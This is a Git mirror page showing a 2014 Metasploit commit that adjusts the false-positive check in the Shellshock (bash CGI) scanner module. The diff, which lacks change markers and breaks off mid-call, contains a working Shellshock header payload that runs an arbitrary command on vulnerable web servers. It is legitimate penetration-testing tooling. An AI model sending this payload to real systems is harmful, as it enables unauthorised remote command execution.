infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Improve false positive check

bug/bundler_fix
William Vu 2014-09-25 01:01:11 -05:00
parent 8daf8d4339
commit b1e9b3664e
No known key found for this signature in database
GPG Key ID: E761DCB4C1629024
1 changed files with 4 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
View File

@ -42,13 +42,16 @@ class Metasploit4 < Msf::Auxiliary
def run_host(ip)
marker = Rex::Text.rand_text_alphanumeric(rand(42) + 1)
user_agent = %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"}
res = send_request_raw(
'method' => datastore['METHOD'],
'uri' => normalize_uri(target_uri.path),
'agent' => %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"}
'agent' => user_agent
)
return if (res && res.body.include?(agent))
if res && res.body =~ /#{marker}(.+)#{marker}/m
print_good("#{peer} - #{$1}")
report_vuln(